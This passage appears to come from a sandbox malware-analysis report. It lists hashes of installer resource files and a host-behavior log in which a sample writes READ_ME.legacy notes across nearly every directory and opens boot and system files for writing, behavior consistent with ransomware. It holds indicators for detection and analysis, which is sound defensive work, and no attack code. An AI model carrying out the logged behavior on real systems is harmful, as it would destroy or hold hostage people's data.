\588bce7c90097ed212\1025\SetupResources.dll	17.09 KB	MD5: 2d781a11b47e1e28b78fe42adc4faf50 SHA1: ad8a52af452d9a0fc9496b658e742851db497476 SHA256: fa3c3476d24dbb4e7cc5e1918f658bbac629131f8df9e5da7644ce0c04306873 SSDeep: 384:S9sIbc0vgkvHfsfjmuXGUojROIwFwqnVV4JGkxm6jk6QwqG6W:S9guv/CjmBNS3VVqvgBdGx	... File Actions Show Properties Download
\588bce7c90097ed212\1025\LocalizedData.xml	72.73 KB	MD5: 2cccdbeb570a38ac62b13648fa60780c SHA1: ce4649b6a5a4718dcaebfbdc1e0fbacdec45b186 SHA256: d398eb4eef1d1608c6b11595a691f1b97b62cdd07fbbb4a7a792c7bb5dffb984 SSDeep: 1536:TnFvZJY2qywgaJ6k5P2j3ZIAtUPcrBiWHOMNORsDTOAnk:LhKgb0cdiOHpnk	... File Actions Show Properties Download
\588bce7c90097ed212\1025\eula.rtf	7.65 KB	MD5: 1c0a3e42046320201ecd17d00993e240 SHA1: a13d92c22cf67d29a0ed2adf5fc4039520dc47e7 SHA256: 3bda3ffbd2d71a6a125471d110c620473b36dca72d9eeaa50a560ff18574e04e SSDeep: 192:8pW3hLjo2MCxXPQDV0J/uA0JsaHwpZmHp8XB6axCp:8pWLjoTwXPQDV8/ujJsaHwLip8A	... File Actions Show Properties Download
\588bce7c90097ed212\1028\LocalizedData.xml	59.65 KB	MD5: 121715ea5868ab4fc2c156d42693a20f SHA1: 0b91b6e87c67be474edae54d6a321886645ca0f9 SHA256: 554fec87c70a1960653f258d7a567e2cc7eabf12b4d00ccfc79fbec3c1437663 SSDeep: 1536:C16SfZqoPbmigPvBzRA8Rr3all46RwDWAdcHpv9/Wrg5RU+eR0N:C1hfkegA84lrducH5JWrCR/f	... File Actions Show Properties Download
\588bce7c90097ed212\1028\eula.rtf	6.42 KB	MD5: 47f8c7fefa923ab652a4c6bbc1e90855 SHA1: 1511baacd8746bc1131c81fa1f0ffb9dfe05efab SHA256: 26f20309f9dd7143efc1e7642f35dac02fe8ce471df7ccf97421b5fba9b80f53 SSDeep: 96:hI4DUkSRIEphF1APcqUPOpjjZ+ZM3jGxQziQHX4r7jRgsrCZDwUzg+DVsUCTq:O8SWon1APcIjoZ94lIvjRgs5Yg+XUq	... File Actions Show Properties Download
\588bce7c90097ed212\1029\SetupResources.dll	18.09 KB	MD5: 967979d1c75b051c4e1d27704dceee90 SHA1: 835cffae186d14d25d090b831a040907c43a79ce SHA256: bb18cf8acbac1d6beab026eebbd522ec31cbbb6f1cc41864a2ce355a8f13f4c3 SSDeep: 384:6F31pFLtbRnQWZDXr7KyKH/EOFdMLR0Xj4dseHZzYXRiB:6FFpFL3nRDXfKH8/RHZYXR8	... File Actions Show Properties Download
\588bce7c90097ed212\1029\LocalizedData.xml	79.33 KB	MD5: be35fcf157d7287eeb13d7d6e5661605 SHA1: d0bf9b7efdca4d6201b51480b3d8e699134fdb1a SHA256: 1c3240a80cea2ade34872b6dd6d2b96a79e9b7584363990b851c6a099dc2e508 SSDeep: 1536:Gd6eUaHv+cuE6PUI5l0x3vxxnVZYc7ScN4+MYYM6pmzWN:GdXHPjDVWc7ScuCYvQze	... File Actions Show Properties Download
\588bce7c90097ed212\1030\SetupResources.dll	18.09 KB	MD5: d6874b7f593ee1020a1a826df7627ce6 SHA1: 5863b7ec27974a9f848193d49363d8194b5abc7d SHA256: 3ffac3020785c2d4a9e107845663e5d4fa4ef3bf52eec4535475eafee97c8781 SSDeep: 384:CG6e/SQBWKSj4oMV/k79ToBVQdJ2OH8tRypvD1KM97grM:CG6f4oMV/WUB6dPH8RyF1Ks7gQ	... File Actions Show Properties Download
\588bce7c90097ed212\1030\LocalizedData.xml	76.18 KB	MD5: 9e33a4d32af186c4dae683f77c24c2d7 SHA1: 0718f703d964814ae0e70a758bbb900ae9d099aa SHA256: 3fb6e54c188a6efa26b062dd91adde60bbaa687818651d0ed3f6629f098db98e SSDeep: 1536:dr9e68PLM9URaKFQBtx3zdexyS+dibTCZhONEKoAM:N9e68Y9Y7CBt6YYCZoNxoJ	... File Actions Show Properties Download
\588bce7c90097ed212\1030\eula.rtf	3.49 KB	MD5: f821ea9e23290da9923b7cfba78fc4cb SHA1: 2e8d140ed43eb459cb16bd532fcd592b7cfbab23 SHA256: 6a1a2a12063d319da827d0c8a884abff3c8df5ef590f8e3bef8e7a5a57f1f849 SSDeep: 96:pK7v5S5daaulenXwVzIXL0eQQuI3fC69AepitG4umu:pK7v6znXwJIXLt9LpKGQu	... File Actions Show Properties Download
\588bce7c90097ed212\1031\LocalizedData.xml	80.67 KB	MD5: 7c36f1f1e87a734202702ed9394aae14 SHA1: e6a81cadbe80b3ad319d4f50361de5934c535963 SHA256: 4b55755d02e8fb30fd04937931a12a13c8368de909195711372709674631928e SSDeep: 1536:3/eSlDayqzL5gmqBKivbUF0loN7x2EjxJJLIrXI8bFeoZ51OXYdq:WmuoBKsS7xTjxJhm4Geo5kXYdq	... File Actions Show Properties Download
\588bce7c90097ed212\1031\eula.rtf	3.60 KB	MD5: d65dbb9146ca881667e39a674715675c SHA1: 5685a2782c7d8fde473a758b5bb21304a6e0378c SHA256: e23eca56d57ca8c685465aad91a91bf4ad753809fb7d9a945b228197a5bf976a SSDeep: 96:3JUD2cQten70m9m9Zg1GYy4qCAEsH8pKhsL4Wj6bo:3WD2cQtS7fm9Zg1GlzVEKhscWT	... File Actions Show Properties Download
\588bce7c90097ed212\1032\eula.rtf	8.93 KB	MD5: 074844866cb9c233429b5a5ff850d58e SHA1: 11834f176a46a54bebf89cfc399aca79a85d9793 SHA256: 46402ad8e3b0eba7f75e284eac450f4766b3a28c01b6b261e012aaea49512adb SSDeep: 192:8f/zh1JnETswPzMr1nKsFcAXz/xTqt7FVuyniASYlEgnmpKwvux2Hb96qB:8f/fJEwwPOnKalDpIbhXjlEgnvT0b9R	... File Actions Show Properties Download
\588bce7c90097ed212\1033\SetupResources.dll	17.09 KB	MD5: ec6344676e5424aed4aa636220eb612f SHA1: d31d23935bd7e1a75464b2821c023778b0624158 SHA256: a936a65b8c9f925649ce1b73c06330b1b04efb31824ae4187049b06f35051605 SSDeep: 384:Xh3Y8J64LIHRFwdf8O+WB/gdqUmZTMRxUyh/YNJIaFongtrYSoBvZyj:R3YR4G2kO+i/6xjJYwaCgJYSopZm	... File Actions Show Properties Download
\588bce7c90097ed212\1033\LocalizedData.xml	75.68 KB	MD5: eac950ddbe6f0e19107e6d750122fd26 SHA1: 8e46aa0500a2f131010a91833928cb441b0911cc SHA256: 0849db44688afb6cd4e0e15ebd3b77ccfd5c94eb46f3be9a026c7272cc218900 SSDeep: 1536:l5sEENf4BztYvJ47Q2IqZ4I3gBBDpXmeo9fRsrljKrOnxeKbL2:l5sffYgJqaR1CuJjKrOxeo2	... File Actions Show Properties Download
\588bce7c90097ed212\1033\eula.rtf	3.37 KB	MD5: 0998f273afcce628a6a6a1dbd6f6103e SHA1: 5cdacd4d0c23ecfa2669292cfb334aa5821952ab SHA256: 4a42e5eba7699f8344360f2bb7078d500839acec2b7d2a150737e874c0bd0ec7 SSDeep: 96:leGixbyJ55cK14Hs0YZV3fLYOWvQUX4xfurEzjJMyFf:EGixbyJ55ceDvLYOWvtcfuiJ3R	... File Actions Show Properties Download
\588bce7c90097ed212\1035\SetupResources.dll	18.09 KB	MD5: f22038b43b73b649e6b6ba811db98564 SHA1: 210a41a33a848727af6529a2a879f430eab72b3f SHA256: 66be6ada9a3e4eea2e3e8e63c966841ab17ed4b021c224b55ff03a906518aa87 SSDeep: 384:ZRu7itVUYKkqTRnGayG9kFQvJRqMj9MqDkCq04cfL7jFyt:Z5tVUY+VXyG9kyRqmCMkzO0t	... File Actions Show Properties Download
\588bce7c90097ed212\1035\LocalizedData.xml	75.47 KB	MD5: 8299eaddc0c91fe88638f90d5f88586a SHA1: 785d60fb53fd27b443a23b81ca021394fe63c7da SHA256: 0667519f8c733d42d24ee3dcecc84b0856e4dac9535879429b8c575d9a547e6a SSDeep: 1536:RKfmBhZPLOQs602JCkG3/AaL4hqHrRo51/tNwO9J2hWpn8Z70A770AXRGL8DC:RKfmBhZPaQskJCtG4rCfCSZpn8O67JB2	... File Actions Show Properties Download
\588bce7c90097ed212\1035\eula.rtf	3.87 KB	MD5: ce36456e4f3e330dc8ba62f983cac2d6 SHA1: 1603c6a895e0ceebdd2b133fdfc3d282b993b43d SHA256: 55154e1af16a9cf48d3c1d02d89f34466b569a23b55e38927f4d18c360e02f63 SSDeep: 96:ZBsLdR2gF+7DtjF4Ibfu1gdxP39Y+WHIMwjTNq1Kx21gQC5:qdRh6DRy10xPNWoMwV6pgQ4	... File Actions Show Properties Download
\588bce7c90097ed212\1036\SetupResources.dll	18.59 KB	MD5: 0283dca8f1154c97e2d28672aee273f4 SHA1: 1d606cea3a6e6268bbe96e6842c24880631ce81a SHA256: 23c35f4876cc8d794a38cba9aae39b304068a326404050589674ac32bb6079a1 SSDeep: 384:1lAzCjzKUGmNqKjPX0ZqwOknSlai3SDceTdq3Ks0vg+FEyLtpHtibEPHnaZ0X9g:1lAzCZ/NqKr8qR+mFSZ5z1nEgtDikaSy	... File Actions Show Properties Download
\588bce7c90097ed212\1036\LocalizedData.xml	81.28 KB	MD5: 0042a388d47d73796d0a236169c5ae07 SHA1: 8a814c7c99204659f93e1c41818b8b0c30aadafd SHA256: be1b0e8963a30c7a2924be8eaecfb212f5b4305809b984f67d933a79c7ca3989 SSDeep: 1536:/jakSH55vq/1cLluu5PakSjdDmcepo68jpVe70qclOHcElYG0uLo:/lSZA1cLlbnWBmJpUTeoqclOzmG0N	... File Actions Show Properties Download
\588bce7c90097ed212\1036\eula.rtf	3.70 KB	MD5: 616a6e48828af7352058dd9a377b84b0 SHA1: 14d0943eed2bfb739bedd9c4abdb065b2c58f2ac SHA256: d38cb15b93425d3b3226bc95a3fe410f709c2df18b731b619d786ebdbc2b81da SSDeep: 96:+VGnAh9QKb4s1rpI2xpwvGitcjFK+914l561T:uGnaLbHrW23wBteFKUm56F	... File Actions Show Properties Download
\588bce7c90097ed212\1037\SetupResources.dll	16.59 KB	MD5: 18db06b5a645544975f1af312cd3233d SHA1: aa69c2c794c156ffb7d565c0a5da336d2e34bb39 SHA256: 3e289bc55ce4f4482cd4c5ebc69a387fb6539eb7830f26e30e4b60b1c8ab0dc7 SSDeep: 384:6ExKzyGG9WZrWagMGMh1fs0Vo7waH29yTAvgX6IpPvgS:hiMW2MHfsaopHQm6IpP9	... File Actions Show Properties Download
\588bce7c90097ed212\1037\LocalizedData.xml	70.64 KB	MD5: fa5931e2446bfc13815c6b9ffa5c42ad SHA1: 6d2c871e219072f48d2dd4af8dfc20956e20e169 SHA256: 189a21d452337b77dea7c1c41a4a4edc2a28f8fa2f153a27ae7bfd4487403ea3 SSDeep: 1536:loeGSUBH0vig7rudb2RqIHDgOhfuETjCjC3M/:ltUB07rudb5IjPuETjCjH/	... File Actions Show Properties Download
\588bce7c90097ed212\1037\eula.rtf	6.95 KB	MD5: 0afb5ac2daf86f7e2ae8d8d0f902ff13 SHA1: 997feb215a0e98d461cf8604efc5a108912162a7 SHA256: 862097c808522c9fd523c00fc4714aed8734723c491ea8df392b66611022ec4a SSDeep: 96:qnja2Fx5tm3+sWYmOwDi6hB+Jqi5Wcncx5OijWGQb/VsxtdWeLZi0+PhL:ga2F1qSTvi6hB+Jqi45BqGQ58We00ML	... File Actions Show Properties Download
\588bce7c90097ed212\1038\SetupResources.dll	18.59 KB	MD5: bf79f495fb4f3e36a0221305c057ed2d SHA1: e20d4bf9441acdff6171a199087d88d7edbf392e SHA256: 5bbe8e8929631cbf7c556218452f6bcacd0684e3ce69168a9bf94124a0a3cd41 SSDeep: 384:BJtEYTOBMGwFHFxIzJ+3KL79rtysO1jR3vlcYvJCX:vtE0QrW0Nd9rUs8hlFMX	... File Actions Show Properties Download
\588bce7c90097ed212\1038\LocalizedData.xml	84.67 KB	MD5: af4838a53632ba1332a679904c897a3a SHA1: 288bf249feb1c2ab6fef6df17c21692257029283 SHA256: 2a0f42f657dd6b2edaf62d8f92ec0f129d8c2f335608ee563f723f3376c888c3 SSDeep: 1536:sFYX1a27nRAbMX+fTAXC+5Di5HzTGgVl4uS4AViz5j3aIgvSTWiUEe3:sFYF/7nMRfspwHzV2WhKIUSTWii	... File Actions Show Properties Download
\588bce7c90097ed212\1038\eula.rtf	4.41 KB	MD5: 2c9d02900997752de13e79a1562f9960 SHA1: c3150f57aef0c8b4c121dd71b6efd6b97eff3a2c SHA256: 3ec7125f929cb401493389fa408ad939c71eeed052b9e1f650e4f2ce514df8e6 SSDeep: 96:W2mvWeR5aKvxU/98ncjeiPiA9jxFU6noW18EYE8GNxYaYixtfKrYSJ9JBVZMV:6aKvxU15jzHU6n98EYE8KTY8QrzHTj4	... File Actions Show Properties Download
\588bce7c90097ed212\1040\SetupResources.dll	18.09 KB	MD5: 06ab848be6efb7b5be45a18431f0d5c5 SHA1: 61f675daa863d1a038661122071cf237c501e8cc SHA256: 5f14bcb823feb29104cad99502ee5e9626464b7bb8be0b542a878f1803fe6b14 SSDeep: 384:edB+9aeRr+ketlEQ7aPWp5fcXwdkuYKKTyBrhG7aOx+91OWp1Ri5x6VtA4O:edBWaksEQeWHfcXay/0rEa++SWpRVty	... File Actions Show Properties Download
\588bce7c90097ed212\1040\LocalizedData.xml	78.44 KB	MD5: 6fa586352b9d859e02a218c6dbf38d4c SHA1: caf3340ce166a95a71fc15ff9b9b5a61072e318c SHA256: 8f21bc406668558113f41299c4bb925ac8b3766e0f9a48384ae621742cf91dac SSDeep: 1536:aGdOu+M4YTdv1KypIjFZBQ2U5BR6UiDp46p8a6Rx8MpFfgBagky:9V4YFoxh/n98lDAag9	... File Actions Show Properties Download
\588bce7c90097ed212\1040\eula.rtf	3.82 KB	MD5: d7b6744aab72b36fa567557265fbf946 SHA1: 3a02adb52f80be1f3cd02f471ac5a8a6f9de430b SHA256: 05545bff3f67fd4ca740eca4a206c972f6fe0f295924fe9a939500837479db78 SSDeep: 96:UF/QULgromNC7cAI/J0Jtmjeuj4yUlCPY2WJB:UF/dgsmNEDJISujWUA2W/	... File Actions Show Properties Download
\588bce7c90097ed212\1041\SetupResources.dll	15.59 KB	MD5: dc415b690510df674a0dee842eb4baae SHA1: 8c16d41c6584f82286617360cae4aa74e6633776 SHA256: dd837cb1f29c8a222f547ba0d4f73616530404398b7c3432968a66e9e355b438 SSDeep: 192:hNDAtGZ9scjaOhMjBbXtnNpBEpgOndB7PyVpW2zBNbq61ewSx9v0/KHswezvjebu:EMZ9sc5W9LtnTHVAYBNgP920klfINz+	... File Actions Show Properties Download
\588bce7c90097ed212\1041\LocalizedData.xml	66.88 KB	MD5: 506bb69a7476a068ffec85b051c6c931 SHA1: 21a8e85c6ee9fd728fefabf2cc0fcc635d4ef027 SHA256: ce3209db01b2015ffdad29df2342559bbf01172b9fa9c7f7ef308313083a609c SSDeep: 1536:n8Do/eHF9GDRKpdRzL1N0OImVZp3W3K2V9S1LuwFw:n8sCGDRW1L1NoPKmSQwFw	... File Actions Show Properties Download
\588bce7c90097ed212\1041\eula.rtf	10.15 KB	MD5: c45f446229971bb1436397775a08e035 SHA1: 29f1407037f936428c87082e0361debffc92a41a SHA256: 67cce1c0b6a07243591e3057ed551e0e2420ec9e07a0c5c1b8f5b3254f79f7e4 SSDeep: 192:+LQdHbopbsLmAAylVQtR3bIHLKsmn7Bog7ZDMBFS+XQT0tkMZKKiWUNhI8:+LbeLiyM/3Urvmn7KwiFXqMZK/D	... File Actions Show Properties Download
\588bce7c90097ed212\1042\SetupResources.dll	15.09 KB	MD5: 0672baf3162209777749b280123020fb SHA1: a7aaeecc95fab0f636c2aa93f2fa2f7541ce047d SHA256: ded265d143f48a72d6c49ba782d33d766ac6427cf17fe212cf128a80bdfa5a50 SSDeep: 384:7BDlRJQTiaS12CTCu5MedndTZ7v23YFkCUmmvdv:7plR+PS1XTb5h1u3YFksSdv	... File Actions Show Properties Download
\588bce7c90097ed212\1042\LocalizedData.xml	63.97 KB	MD5: a813163d107612c4a6d8162decd0c1bb SHA1: c17c3aa91c267a10d092e7bdb48d6ecc50c226f4 SHA256: 26fbcdbfd7ddb2a1c1ac726fba0c9e9e2d46c4ce76893d2a6c9d037fc6ec31a2 SSDeep: 1536:9Fp7cUQoteH71foWOv5odHHzyYs//qfmTf9WgHN/330tSjQC/P:5nts71foWO2ztDmTf9WANf3EC/P	... File Actions Show Properties Download
\588bce7c90097ed212\1042\eula.rtf	12.65 KB	MD5: 24941a079b402d251f219cd67466396c SHA1: 988c2c5cff190f17f229c8e34f9e0d410366be3b SHA256: 05539da91def9968e72ace6fd8d2155cade454241964255a73d97fcfdcb0385a SSDeep: 192:yr4j1V/iNG0kgkKIeYruuCPD5bB1gPPxBNJMjEfRiI18QI3P9qfdL4DA8:yWd+tkKIeYrudFb7gP/NTfRGtP9SKDA8	... File Actions Show Properties Download
\588bce7c90097ed212\1043\SetupResources.dll	19.09 KB	MD5: 416554e54cf24b888f12c77f6ff8b2f2 SHA1: 4d5b767621f51e3e8ca5f68b16cb07c8edcf040d SHA256: 2747528ff89a6637f6e0ea6c9488ec3fee8c33ef611145a96d80d89928180115 SSDeep: 384:YfrRs02aIMuTEGuluFNt+IxLsrHggtdGPPWJB1vB7FUUBaN7sc4x+i:Y9PgVEPuFNt+IxkGPP81vBhxBaX4Ii	... File Actions Show Properties Download
\588bce7c90097ed212\1043\LocalizedData.xml	78.03 KB	MD5: e8c0bdd7b7d56f98c1d23c8804c894db SHA1: 92e8b3c810e191e7237a8d26684bf9c91de67b94 SHA256: 6bd0804e2410334c334926047c71cf0955bcdde4c269cd98ec70fc281113d234 SSDeep: 1536:mbSEHsgyz1XI6A7/VMFQJawSUNnhhmf78DBYuXlgRydTpJTyyNpOk0n:fEHzAI6AZMW46nPmz8DNgsNGHn	... File Actions Show Properties Download
\588bce7c90097ed212\1043\eula.rtf	3.72 KB	MD5: a6087b15932296eef7ae2523170eca55 SHA1: d43ac5972e25ef127f56c2a8c0ac1ad9ea2dc5b2 SHA256: bed44733e06c4e8c7c3898c509eb04870ae5300137cc42a95ea9b62210e11217 SSDeep: 96:uConI8gdSLXfPWWDmsieznMnzd/KqjnPrJOe7un9S:ufnjgdSLnJDa4qjtOVn4	... File Actions Show Properties Download
\588bce7c90097ed212\1044\SetupResources.dll	17.59 KB	MD5: f292492333b5a59991261531794b6590 SHA1: ec1230d791514431ce1501c0b04530a64e6d43e2 SHA256: d2c3b26d0dece40b7b3a980988885685908c4c14c6b99add39063a3c198e173e SSDeep: 384:PXF/nyoGCCE8WjEEGGqFgWZ/11V9KABFdDxmbaClfgQ8+/uFui:PXF/yoGCcWWGqFlZtD9KAzh8bhlf3RMv	... File Actions Show Properties Download
\588bce7c90097ed212\1044\LocalizedData.xml	77.70 KB	MD5: 904aeaad4c4bef68af85ae96145059a8 SHA1: 5094c483a56f51769a620be6adfdb734ddfb7671 SHA256: 06389a5ad7d8f49a33c10e0da725e87146d9ba816db9cbb7373a32319b2e7c33 SSDeep: 1536:XfZJzx2kvjrGX1UQzPEceV2of2UjYU5adIdUtzkE07LiBk+9H/wjcclaF:XR/2kL6lDzPEceV2yoedUCEXk+hwjccY	... File Actions Show Properties Download
\588bce7c90097ed212\1044\eula.rtf	3.23 KB	MD5: 336753461769708e72c8f2f07f933966 SHA1: 502900bd9747e2e02badf5f663c534759cb5b4e1 SHA256: 33e0f4c6f35b89f255f8bd44732f607545082352e52d16893a1102bd14b4c256 SSDeep: 96:ERaIK8QD4YYOzO6pEfQHBX29ympNgb7TyMp9v:ERzK8QtYOJpRBdXb7l	... File Actions Show Properties Download
\588bce7c90097ed212\1045\SetupResources.dll	18.09 KB	MD5: 537e740dd9143638a845941b0741dcd8 SHA1: a68456dc21cfbba98cc9f492b9409e56395cf93f SHA256: e8d46e0bef62108e8c56f58c621e2eeb6570b2e14e8924f105d91661cd8eecc2 SSDeep: 384:tC/WTuVOg5PJCwx6dtnB/fQsDutTKvgsIwZEJqjBJiIjAU:hwH5swInRdutTh+RisAU	... File Actions Show Properties Download
\588bce7c90097ed212\1045\LocalizedData.xml	80.70 KB	MD5: 5435dac26ab920347b98e2b93357f370 SHA1: 9c3bb148fdfb26c93be23c9ec8516fab9705ebd3 SHA256: 907e01ee6292646932d6453b1d6a71e6a0e8b1891d5809731de0dfc7dc4edab6 SSDeep: 1536:6RGmEds0H4TqjrdLagIytfgycCobx+SlWZcvLZrFZMTq60eRx+x54bhJk:5mEdrvdLagImuqZcFnMTRRxaWhJk	... File Actions Show Properties Download
\588bce7c90097ed212\1045\eula.rtf	4.20 KB	MD5: ead8e42a924393eef8a3e6f31a941570 SHA1: 0babb0016ca0e63d3ac68bf1dfb2b3895de489e7 SHA256: a94a0b479a4134d28afcea0e7f7d4b01cf0c9e79c8f657c84939e151f0ace04d SSDeep: 96:rr60pHf8tTMtMQz9tgL7sNEvDYBQmkGhGCZYIcNahShvwFafDqt:rtpHf0gDzyZDMQHaZDWCKvwM+t	... File Actions Show Properties Download
\588bce7c90097ed212\1046\SetupResources.dll	18.09 KB	MD5: 0bcf5d0dd7e8088a3d201b1fb8911601 SHA1: 14a91a934ce6fe07a7a6d02d282dacda7a932945 SHA256: c958fd159dcbdfccb9c00e2b4c7853f791b3fc9a5c9c93467b3d5dcf77c9c073 SSDeep: 384:m3LvCaBujmo6n5mgc5GEzw8VmSMfDKNd7KnGhrq7qEcsRZtRWEdQnesd5RiP:oLvP0D652GQwPF4d7KGJCcs/GWQJ5RiP	... File Actions Show Properties Download

Host Behavior

File (5482)

Operation	Filename	Additional Information	Count	Logfile
Create	\$GetCurrent\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$Recycle.Bin\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Boot\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Documents and Settings\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\ESD\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Logs\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\PerfLogs\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Recovery\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\System Volume Information\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Users\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\Windows10Upgrade\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\swapfile.sys	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\pagefile.sys	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\hiberfil.sys	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\BOOTSECT.BAK	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\BOOTNXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\bootmgr	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$WINRE_BACKUP_PARTITION.MARKER	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\Logs\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$GetCurrent\SafeOS\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$Recycle.Bin\S-1-5-18\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1025\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1028\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1029\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1030\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1031\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1032\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1033\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1035\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1036\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1037\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1038\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1040\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1041\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1042\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1043\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1044\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1045\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1046\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1049\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1053\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\1055\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\2052\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\2070\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\3076\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\3082\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Client\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Extended\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Graphics\READ_ME.legacy	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Windows6.1-KB958488-v6001-x86.msu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	\588bce7c90097ed212\Windows6.1-KB958488-v6001-x64.msu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
